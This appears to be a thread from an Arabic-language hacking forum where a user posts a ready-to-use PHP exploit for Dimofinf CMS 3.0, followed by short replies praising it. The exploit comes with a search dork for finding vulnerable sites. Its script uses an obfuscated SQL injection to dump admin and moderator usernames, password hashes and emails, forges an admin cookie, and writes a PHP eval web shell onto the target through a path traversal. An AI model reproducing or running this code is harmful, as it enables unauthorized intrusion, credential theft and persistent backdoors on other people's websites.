1. أهلا وسهلاً بكم في :: IQ-TeaM FORUM :: .
    إذا كانت هذه الزيارة الأولى أو لديك الرغبة بالانضمام لأعضاء شبكة عراق تيم فيجب الاطلاع على خصوصية الشبكه فربما بقائك زائر افضل لك من الانضمام بحيث أن قوانين شبكة عراق تيم لا تتناسب مع اهتماماتك .
    • للأطلاع على الخصوصية وسياسة الاستخدام - التفاصيل
    • بعد الاطلاع على سياسة الموقع وقوانين شبكة عراق تيم يمكنك التسجيل معنا - تسجيل عضو جديد
    إستبعاد الملاحظة
الكاتب : Hacker-X | المشاهدات : 239 | الردود : 4
الوسوم:
حالة الموضوع:
مغلق
  1. Hacker-X Developer

    الأنتساب:
    ‏9 ابريل 2012
    المشاركات:
    91
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    الإقامة:
    قطر
    نظام التشغيل:
    windows 8.1
    بسم الله الرحمن الرحيم

    السلام عليكم ورحمة الله وبركاته

    سبحانك لا علم لنا الا ما علمتنا انك انت العليم الحكيم


    معنى اليوم ثغرة sql في سكربت Dimofinf cms Version 3.0

    أولا نحتاج الى سيرفر شخصي ع الجهاز appserv

    التحميل من الموقع الرسمي

    كود PHP:
    http://www.appservnetwork.com/


    الان نشرح الثغرة

    الدورك : Powered by Dimofinf cms Version 3.0.0

    الاصابة : online.php?action=detailstat&ip=%5c

    الاتسغلال..

    احفظه بامتداد php

    كود PHP:
    <?php 

    set_time_limit
    (0); 
    error_reporting(0); 
    /*  
        #################### 
        # by Ali , UzunDz 
        # UzunDz@gmail.com 
        # sec4ever.com 
        #################### 
         
        # Vuln Code :  

        else if ( $dimofinf->GPC['action'] == "detailstat" ) 
        { 
            $outdata = "<table class=\"tborder\" width=\"100%\">"; 
            $fintotal = 0; 
            $unusr_total = $dimofinf->db->query_read_slave( "SELECT module,COUNT(*) AS total FROM ".TABLE_PREFIX."online WHERE ip='".$_REQUEST[ip]."' GROUP BY module  ORDER BY total DESC" ); 
            [...] 
        } 
            ip='".$_REQUEST[ip]."' // inject via post to bypass fllter 
            POST_DATA : ip=|sql] 
    */ 

    if(isset($_POST['SQli']) && $_POST['url'] != ""){ 
        
    $url $_POST['url']; 

        
    $cURL2 curl_init(); 
        
    curl_setopt($cURL2,CURLOPT_RETURNTRANSFER,1); 
        
    curl_setopt($cURL2,CURLOPT_URL,$url); 
        
    curl_setopt($cURL2,CURLOPT_USERAGENT,'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)'); 
        
    $cURLex curl_exec($cURL2); 

        echo 
    "<textarea cols='80' rows='10' >"
        
    $url $_POST['url']; 
        
    $adminfo "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e)/**//*!from*//**//*!profile*//**/%23"
        
    $curl curl_init(); 
        
    curl_setopt($curlCURLOPT_URL,"$url/online.php?action=detailstat"); 
        
    curl_setopt($curlCURLOPT_RETURNTRANSFER1); 
        
    curl_setopt($curlCURLOPT_POST1); 
        
    curl_setopt($curlCURLOPT_POSTFIELDS,$adminfo); 
        
    curl_setopt($curlCURLOPT_HEADERfalse); 
        
    $exec=curl_exec($curl); 
        
    curl_close($curl); 
        
    preg_match("#<x00x>(.*?)</x00x>#" ,$exec,$res1); 
        
    $admres explode(":",$res1[1]); 
        echo 
    "[+] $url"
        echo 
    check($url); 
        echo 
    cpuser($url); 
        echo 
    "\n[+] Admin :\nid : $admres[0]\nuser : $admres[1]\npass : $admres[2]\nemail : $admres[3]\n\n"
        
    $cook "dimadmlogin=$admres[1]-$admres[2]-1445767838"
        echo 
    "cookie : ".$cook
        for(
    $LIMIT=1;$LIMIT<5000;$LIMIT++){ 
            
    $modinfo "ip=dz'/**//*!12345%55NION*//**//*!%53ELECT*//**/1,concat(0x3c783030783e,id,0x3a,username,0x3a,password,0x3a,email,0x3c2f783030783e) from moderators LIMIT ".$LIMIT.",1/**/%23"
            
    $ch curl_init(); 
            
    curl_setopt($chCURLOPT_URL"$url/online.php?action=detailstat"); 
            
    curl_setopt($chCURLOPT_POST1); 
            
    curl_setopt($chCURLOPT_POSTFIELDS,$modinfo); 
            
    curl_setopt($chCURLOPT_RETURNTRANSFER1); 
            
    curl_setopt($chCURLOPT_HEADERfalse); 
            
    $exec=curl_exec($ch); 
            
    curl_close($ch); 
            
    preg_match("#<x00x>(.*?)</x00x>#" ,$exec,$res2); 
            if(empty(
    $res2)){break;} 
            
    $modres explode(":",$res2[1]); 
            echo 
    "\n[+] Moderators id=$modres[0] :\nid : $modres[0]\nuser : $modres[1]\npass : $modres[2]\nemail : $modres[3]\n\n"
        } 
        echo 
    "</textarea><br /><br />"
        
    upload($url,$cook); 

    function 
    upload($url,$cook){ /* if admin panel not protected with firewall , the function may be upload a shell */ 
        //$payload = "%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E"; 
        
    $x00x curl_init(); 
        
    curl_setopt($x00xCURLOPT_URL$url."/dimcp/style.php?action=edit&stylef=default"); 
        
    curl_setopt($x00xCURLOPT_COOKIE$cook); 
        
    curl_setopt($x00xCURLOPT_POST1); 
        
    curl_setopt($x00xCURLOPT_POSTFIELDS,'template=../../x00x_BOT.php&newtext=%3C%3F%0D%0Aecho+%27x00x_BOT%3Cform+action%3D%22%22+method%3D%22POST%22+%3E%0D%0A%3Cinput+type%3D%22text%22+name%3D%22id%22++%3E%0D%0A%3C%2Fform%3E%27%3B%0D%0Aif+%28%40%24_POST%5B%27id%27%5D%29%7B%0D%0A%24s%3D%22str%22.%22iPs%22.%22las%22.%22hes%22%3B%0D%0AeVaL%28%24s%28%24_POST%5B%27id%27%5D%29%29%3B%0D%0A%7D%0D%0A%3F%3E&edit=%CA%CD%D1%ED%D1'); 
        
    curl_setopt($x00x,CURLOPT_USERAGENT,"Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0"); 
        
    curl_setopt($x00x,CURLOPT_RETURNTRANSFER,1); 
        
    $res curl_exec($x00x); 
        
    //print_r($res); 
        
    if(eregi("x00x_BOT",@file_get_contents($url."/x00x_BOT.php"))){ 
        echo 
    "[+] <a href='".$url."/x00x_BOT.php'>".$url."/x00x_BOT.php</a> -> Upload Success\n"
        
    file_put_contents("dimofinf-up.txt","$url/x00x_BOT.php\n",FILE_APPEND); 
        }else {echo 
    "[+] $url/ -> Upload Filed\n";} 

    function 
    check($url){ /* check the panel if protected or not */ 

        
    if(preg_match('<div class="tcat" align="center">',file_get_contents("$url/dimcp/"))){ 
            echo 
    " -> Admin panel Not Protected\n"
        }else { 
            echo 
    " -> Admin panel Protected\n"
        } 

    function 
    cpuser($url){ /* get cpanel user from local file disclosure vuln */ 
        
    $x preg_match("/Table '(.*?)_/",file_get_contents("$url/search.php?action=startsearch&keyword=uzundz&searchin=albumss&submit="),$cp); 
        if(
    $x){ 
        echo 
    "Cpanel User -> ".$cp[1];} 

    ?>
    و افتحه عادي http://127.0.0.1/ex.php

    وستجد فورم حط فيه الموقع و السكربت يقوم بالاستغلال واستخراج المعلومات

    للتوضيح

    [​IMG]

    دعواتكم بالتوفيق

    في امان الله :{8!}:
     
  2. nasern Active DeveloPer

    الأنتساب:
    ‏26 مارس 2012
    المشاركات:
    93
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    20
    رد: DimoFinf ==> Upload via SQLi

    يَعطيـڪ العافيـه’ ..:{1}:
     
  3. NETJOURNAL مشرف

    الأنتساب:
    ‏18 مايو 2006
    المشاركات:
    676
    الإعجابات المتلقاة:
    1,544
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الوظيفة:
    ExploitCoding - ShellCoding - Defacer
    الإقامة:
    etc/shadow/~root
    نظام التشغيل:
    windows 7
    اللغة البرمجية:
    PHP
    رد: DimoFinf ==> Upload via SQLi

    بارك الله بيك عزيزي ..واصل :{1!}:
     
  4. CoBrA-M Developer

    الأنتساب:
    ‏2 مايو 2014
    المشاركات:
    100
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:
    50
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    Python
  5. Black-Heart V • I • P

    الأنتساب:
    ‏24 مارس 2014
    المشاركات:
    102
    الإعجابات المتلقاة:
    1,987
    نقاط الجائزة:
    215
    الجنس:
    ذكر
    الإقامة:
    أطهر البقاع
    نظام التشغيل:
    Linux
    حسابي في الزون اتش Zone-H:
    اللغة البرمجية:
    PHP
    YouTube:
    رد: DimoFinf ==> Upload via SQLi

    تم طرح الثغرة من قبلي ورفعتها على موقع لان السيرفر الشخصي له استغلات لاختراق الجهاز ^^ آسف أخي موضوعك مكرر ومكانه أيضا خاطئ الثغرة ليست من اكتشافك ^
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة